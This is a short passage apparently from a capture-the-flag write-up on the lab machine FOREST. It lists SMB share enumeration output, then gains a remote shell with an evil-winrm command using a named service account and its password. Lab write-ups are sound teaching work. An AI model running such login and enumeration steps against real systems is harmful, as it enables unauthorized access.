SMB 10.10.10.161 445 FOREST C$ Default share
SMB 10.10.10.161 445 FOREST IPC$ Remote IPC
SMB 10.10.10.161 445 FOREST NETLOGON READ Logon server share
SMB 10.10.10.161 445 FOREST SYSVOL READ Logon server share
Nothing really interesting
Initial Foothold
Gaining a shell via winrm
evil-winrm -i 10.10.10.161 -u svc-alfresco -p s3rvice